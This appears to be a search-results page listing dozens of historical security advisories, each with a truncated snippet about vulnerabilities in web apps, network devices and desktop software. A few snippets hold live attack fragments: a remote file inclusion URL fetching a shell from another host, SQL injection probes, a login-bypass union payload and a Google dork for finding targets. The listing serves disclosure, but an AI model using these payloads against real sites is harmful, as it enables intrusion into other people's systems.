47153 matches found
[Full-disclosure] Aruba Networks - Unauthorized Administrative and WLAN Access through Guest Account
n.runs AG http://www.nruns.com/ security at nruns.com n.runs-SA-2007.001 8-Feb-2007 Vendor: Aruba Networks, http://www.arubanetworks.com Affected Products: Aruba Mobility Controllers 200, 600, 2400, 6000 Alcatel-Lucent OmniAccess Wireless 43xx and 6000 Vulnerability: Unauthorized Administrative a...
[SIG^2 G-TEC] NodeManager Professional V2.00 Buffer Overflow Vulnerability
SIG^2 Vulnerability Research Advisory NodeManager Professional V2.00 Buffer Overflow Vulnerability by Tan Chew Keong Release Date: 17 Jan 2005 ADVISORY URL http://www.security.org.sg/vuln/nodemanager200.html SUMMARY NodeManager Professional http://www.h4.dion.ne.jp/you4707/NodeManagerPro.html is ...
[Full-Disclosure] php-ping: Executing arbritary commands
ppp-design found the following design error in php-ping: Details ------- Product: php-ping Affected Version: no version information included in the script Immune Version: latest version OS affected: all OS with php Vendor-URL: http://www.theworldsend.net/ Vendor-Status: informed, new version...
NSFOCUS SA2003-06 : Microsoft Windows RPC DCOM Interface Heap Overflow Vulnerability
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 NSFOCUS Security AdvisorySA2003-06 Topic: Microsoft Windows RPC DCOM Interface Heap Overflow Vulnerability Release Date: 2003-09-11 CVE CAN ID: CAN-2003-0528 http://www.nsfocus.com/english/homepage/research/0306.htm Affected system: ==================...
Win32 Device Drivers Communication Vulnerabilities
Win32 Device Drivers Communication Vulnerabilities Proof Of Concept - Exploiting Norton AntiVirus Device Driver Written by Lord YuP / sEC-Labs ^ tkT Tested on NAV 2002! zipped exploit http://sec-labs.hack.pl DISCLAIMER: This paper is written in educational purposes only. Author, sEC-Labs, tkT tea...
ESA-2015-131: EMC Documentum Content Server Multiple Vulnerabilities
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ESA-2015-131: EMC Documentum Content Server Multiple Vulnerabilities EMC Identifier: ESA-2015-131 CVE Identifier: CVE-2015-4531, CVE-2015-4532, CVE-2015-4533, CVE-2015-4534, CVE-2015-4535, CVE-2015-4536 Severity Rating: CVSS v2 Base Score: See below f...
Remote file upload vulnerability in videowhisper-video-conference-integration wordpress plugin v4.91.8
Title: Remote file upload vulnerability in videowhisper-video-conference-integration wordpress plugin v4.91.8 Author: Larry W. Cashdollar, @larry0 Date: 2015-03-29 Download Site: https://wordpress.org/support/plugin/videowhisper-video-conference-integration Vendor: http://www.videowhisper.com/...
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...
[USN-2165-1] OpenSSL vulnerabilities
========================================================================== Ubuntu Security Notice USN-2165-1 April 07, 2014 openssl vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: -...
[security bulletin] HPSBMU02894 rev.1 - HP Network Node Manager I (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Denial of Service (DoS), Unauthorized Access, Execution of Arbitrary Code
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emrna-c03824583 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03824583 Version: 1 HPSBMU02894 rev....
Cisco IOS UDP Denial of Service Vulnerability
Cisco IOS UDP Denial of Service Vulnerability ------------------------------------------------------------------ I. Summary Cisco routers running IOS 15.0 allows a remote attacker to cause a denial of service via a flood of UDP packets a randomly chosen UDP port...
XSS and Content Spoofing vulnerabilities in CKEditor
Hello 3APA3A! I want to warn you about Cross-Site Scripting and Content Spoofing vulnerabilities in CKEditor. XSS: This is Persistent XSS vulnerability. Attack is conducting via placing link with setting the style. a href="http://test"...
Multiple vulnerabilities in several ATEN IP KVM Switches
Jakob Lell from the TU Berlin computer security working group http://www.agrs.tu-berlin.de/v-menue/agrechnersicherheit/parameter/en/ has discovered multiple vulnerabilities in several ATEN IP KVM Switches. Affected products: - ATEN KH1516i IP KVM Switch browser firmware version 1.0.063 - ATEN...
[Full-disclosure] CVE-2008-5557 - PHP mbstring buffer overflow vulnerability
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 CVE-2008-5557 - PHP mbstring buffer overflow vulnerability CVE Number: CVE-2008-5557 Author: Moriyoshi Koizumi [email protected] Release Date: 2008-12-21 Type: heap buffer overflow Affected Versions: 4.3.0 and later versions including PHP 5 Not Affected: a...
pfa CMS v6.0 (index.php repinc) Remote File Include Vulnerability
pfa CMS v6.0 // AYYILDIZ.ORG Gururla Sunar ! = OZELHAREKAT Author: iLker Kandemir [email protected] ScriptSite: http://pfa.netsliver.com/downloadpfa Tnx: H0tturk,Ekin0x,Dumenci,Gencnesil,Gencturk,Str0ke Exploit: http://site/pfapath/index.php?repinc=http://shell.txt?...
20/20 auto gallery [ multiples injection sql ]
vendor site:http://www.2020autogallery.com/ product:20/20 auto gallery bug:injection sql global risk:high injection sql get : http://site.com/vehiclelistings.asp?vehicleID='sql http://site.com/vehiclelistings.asp?categoryIDlist='sql http://site.com/vehiclelistings.asp?saletype='sql...
vBulletin allows arbitrary code execution
OVERVIEW ======== vBulletin http://www.vbulletin.com is a commonly used web forum system written in PHP. One of its key features is use of templates, which allow the board administrator to dynamically modify the look of the board. vBulletin templates are parsed with the eval function. This could ...
HttpFileServer code execution
Code execution via GET request...
Multiple vulnerabilities in PBBoard
Advisory ID: HTB23101 Product: PBBoard Vendor: www.pbboard.com Vulnerable Versions: 2.1.4 and probably prior Tested Version: 2.1.4 Vendor Notification: July 18, 2012 Public Disclosure: August 8, 2012 Vulnerability Type: SQL Injection CWE-89, Improper Authentication CWE-287, Improper Access Contro...
PR10-07: Unauthenticated File Retrieval (traversal) within ColdFusion administration console
PR10-07: Unauthenticated File Retrieval traversal within ColdFusion administration console Vulnerability found: 17th April 2010 Vendor informed: 19th April 2010 Vulnerability fixed: 10th August 2010 Severity: High Description: Adobe ColdFusion is a easy to use and very widely adopted Programming...
[Full-disclosure] Persits Software XUpload Control Buffer Overflow Exploit
I tried posting this yesterday, don't know what happened, anyhow, my advance apologies for any double posts. I took a shot at writing an exploit for this, so here goes. Code is inline and attached. ------------------------- !-- written by e.b. Persits Software XUpload Control AddFolder Buffer...
Battle.net Clan Script for PHP 1.5.1 Remote SQL Injection Vulnerability
script : Battle.net Clan Script 1.5 file : login.php attack : injection sql auteur : h a c k e r X code : ------------------------------------------------------------------------------------------ line 9 -- $user = $POST'user'; line 10-- $pass = $POST'pass'; ..... ..... ..... line 21--...
twlc advisory: all versions of php nuke are vulnerable...
twlc security divison 24/09/2001 Php nuke BUGGED. Found by: LucisFero and supergate ./twlc Summary This time the bug is really dangerous...it allows you to 'cp' any file on the box... or even upload files... Systems Affected all the versions ARE vulnerable except '5.0 RC1' i wonder why a released...
[USN-2744-1] Apport vulnerability
========================================================================== Ubuntu Security Notice USN-2744-1 September 24, 2015 apport vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: -...
ESA-2013-045: RSA BSAFE® SSL-C Security Update for SSL/TLS Plaintext Recovery (aka “Lucky Thirteen”) Vulnerability
ESA-2013-045.txt -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ESA-2013-045: RSA BSAFE® SSL-C Security Update for SSL/TLS Plaintext Recovery aka “Lucky Thirteen” Vulnerability EMC Identifier: ESA-2013-045 CVE Identifier: CVE-2013-0169 Severity Rating: CVSS v2 Base Score: 2.6...
Multiple vulnerabilities in Help Desk Software
Vulnerability ID: HTB23041 Reference: https://www.htbridge.ch/advisory/multiplevulnerabilitiesinhelpdesksoftware.html Product: Help Desk Software Vendor: freehelpdesk.org http://freehelpdesk.org/ Vulnerable Version: 1.1b and probably prior Tested Version: 1.1b Vendor Notification: 17 August 2011...
[security bulletin] HPSBMA02658 SSRT100413 rev.1 - Insight Control for Linux (IC-Linux), Remote Unauthorized Elevation of Privilege, Execution of Arbitrary Code, Encryption Downgrade, Information Disclosure, Denial of Service (DoS)
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c02794777 Version: 1 HPSBMA02658 SSRT100413 rev.1 - Insight Control for Linux IC-Linux, Remote Unauthorized Elevation of Privilege, Execution of Arbitrary Code, Encryption Downgrade, Information...
Phorum < 5.2.10 Cross-Site Scripting/Request Forgery
=cicatriz [email protected]==advisories= / / / / // / / // / o / / .-/ =Phorum 5.2.10 Cross-Site Scripting/Request Forgery==/= == =Advisory & Vulnerability Information=== Title: Phorum 5.2.10 Cross-Site Scripting/Request Forgery Advisory ID: VUDO-2009-1504 Advisory URL:...
ZDI-07-075: Microsoft Internet Explorer Element Tags Vulnerability
ZDI-07-075: Microsoft Internet Explorer Element Tags Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-07-075.html December 11, 2007 -- CVE ID: CVE-2007-5344 -- Affected Vendor: Microsoft -- Affected Products: Internet Explorer 6 Internet Explorer 7 -- TippingPointTM IPS Customer...
Simple PHP Blog (sphpblog) <= 0.5.1 Multiple Vulnerabilities
Title: Simple PHP Blog sphpblog = 0.5.1 Multiple Vulnerabilities Vendor: http://sourceforge.net/projects/sphpblog/ Advisory: http://acid-root.new.fr/?0:15 Author: DarkFig gmdarkfig at gmail dot com Released on: 2007/10/21 Changelog: ---------- L M H T Summary: Ip Spoofing X X Cross Site Scripting...
Apache 2.0.39 directory traversal and path disclosure bug
Auriemma Luigi, PivX security advisory AL001 Application: Apache WebServer http://httpd.apache.org Version: 2.0.39 and previous 2.0.x, ONLY on systems that supports backslash path delimiters Win/Netware/OS2 etc... Bug: Directory traversal vulnerability and path disclosure Risk high: An attacker c...
ntp multiple security vulnerabilities
Multiple memory corruptions...
Wolf CMS 0.8.2 Arbitrary File Upload Vulnerability
,--^----------,--------,-----,-------^--, | ||||||||| --------' | O .. CWH Underground Hacking Team .. +---------------------------^----------| ,-------, | / XXXXXX /| / / XXXXXX / / / XXXXXX / / XXXXXX / / XXXXXX / ------' Exploit Title : Wolf CMS Arbitrary File Upload Exploit Date : 16 April 20...
FCKEditor File Upload Vulnerability
Description: There is no validation on the extensions when FCKEditor 2.6.8 ASP version is dealing with the duplicate files. As a result, it is possible to bypass the protection and upload a file with any extension. - Reference: http://www.exploit-db.com/exploits/23005/ vulnerable versions: prior...
phpBB AJAX Chat/Shoutbox MOD CSRF Vulnerability
View here: https://www.stevenroddis.com/phpbb-ajax-chatshoutbox-mod-csrf-vulnerability/ Title: phpBB AJAX Chat/Shoutbox MOD CSRF Vulnerability Release Date: 2011-04-30 Product Affected: http://startrekaccess.com/community/viewtopic.php?f=127&t=8675 Responsible Disclosure: After repeated attempts ...
Directory Traversal Vulnerability in Viola DVR VIO-4/1000
============================================================== Viola DVR VIO-4/1000 - Directory Traversal Vulnerability ============================================================== Software: Viola DVR VIO-4/1000 other products may be affected Vendor: http://www.videcon.co.uk/ Vuln Type: Directo...
[Aria-Security Team] MyBB Cross-Site Scripting
Aria-Security Team http://Aria-Security.com http://www.aria-security.com/forum/showthread.php?p=144 Contact: [email protected] Type:Remote Cross-Site Scripting Article on XSS: http://aria-security.net/xss.rar Discovered By Aria-Security Team Software: MyBB Explanation: First of all user...
OPENi-CMS 1.0.1(config) Remote File Inclusion Vulnerability
Update: 22:44 09/11/06 Subject: "OPENi-CMS 1.0.1config Remote File Inclusion Vulnerability " Vulnerable version: OPENi-CMS 1.0.1 Operating System: - All OS Vendor URL: Support - [email protected] Website - http://www.openi-cms.org/ Description: Openi-CMS he one software PHP Content Management...
PHP Event Calendar versi 1.4 (path_to_calendar) Remote File Inclusion
SolpotCrew Community PHP Event Calendar versi 1.4 pathtocalendar Remote File Inclusion Vendor site : http://www.softcomplex.com/products/phpeventcalendar/ Bug Found By :Solpot a.k.a k. Hasibuan 13th july 2006 contact: [email protected] Website : http://www.solpotcrew.org/adv/solpot-adv-01.t...
[EEYEB20050708] Microsoft Distributed Transaction Coordinator Memory Modification Vulnerability
Microsoft Distributed Transaction Coordinator Memory Modification Vulnerability Release Date: October 11, 2005 Date Reported: July 8, 2005 Severity: High Remote Code Execution Vendor: Microsoft Systems Affected: Windows 2000 Server SP0 - SP4 - Vulnerable - Anonymous remotely exploitable by defaul...
SEC Consult SA-20130625-0 :: Multiple vulnerabilities in IceWarp Mail Server
SEC Consult Vulnerability Lab Security Advisory 20130625-0 ======================================================================= title: Multiple vulnerabilities in IceWarp Mail Server product: IceWarp Mail Server vulnerable version: =10.4.5 fixed version: 10.4.5-1 impact: Critical homepage:...
Mozilla Firefox / Thunderbird / Seamonkey multiple security vulnerabilities
Information leakage, multiple memory corruptions, crossite scripting, etc...
Sparta Systems TrackWise TeamAccess module Multiple Cross Site Scripting Vulnerabilities
========================================= Yaniv Miron aka "Lament" Advisory Feb 28, 2010 Sparta Systems TrackWise TeamAccess module Multiple Cross Site Scripting Vulnerabilities ========================================= ===================== I. BACKGROUND ===================== TrackWise® by Spart...
WebSPELL <= 4.01.02 (picture.php) Remote File Disclosure Vulnerability
WebSPELL = 4.01.02 picture.php Remote File Disclosure Vulnerability Discovered by: Trex Visit: www.Trex-Online.net / www.UnderGround.ag Comment: Happy easter! / / / / / / / // / GIVE ME A CARROT OR I WILL O O/ BLOW UP YOUR HOUSE / / ^ / / / // / // /// Vulnerability 1: Advantage: works...
[Full-disclosure] Some 0day Pocs
Mati Aharoni muts .@. offensive-security.com mailto:[email protected] http://www.offensive-security.com My 7 line python fuzzer found several file format bugs in 3 hours. Quite alarming. No deep analysis was done, I leave that to the community. These are some of the results: file789-1.d...
ASPTicker 1.0 (admin.asp) Remote Login ByPass SQL Injection Vulnerability
Title : ASPTicker 1.0 admin.asp Remote Login ByPass SQL Injection Vulnerability Author : ajann Contact : : S.Page : http://www.aspapps.com $$ : $ 17.00 SQL--------------------------------------------------------- http://target/path//admin.aspByPass Example: //Password 'union select 0,0,0 from...
Mafia Moblog <= 6 (pathtotemplate) Remote File Inclusion Vulnerability
------------------------------------------------------------------------ ------------------- Mafia Moblog pathtotemplate Remote File Inclusion ------------------------------------------------------------------------ ------------------- Author : Sh3ll Date : 2006/04/30 HomePage : http://www.sh3ll....
[waraxe-2004-SA#031 - Multiple vulnerabilities in e107 version 0.615]
================================================================================ waraxe-2004-SA031 ================================================================================ Multiple vulnerabilities in e107 version 0.615...
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...
HttpFileServer 2.3.x Remote Command Execution
Affected software: http://sourceforge.net/projects/hfs/ Version : 2.3x Exploit Title: HttpFileServer 2.3.x Remote Command Execution Google Dork: intext:"httpfileserver 2.3" Date: 11-09-2014 Remote: Yes Exploit Author: Daniele Linguaglossa Vendor Homepage: http://rejetto.com/ Software Link:...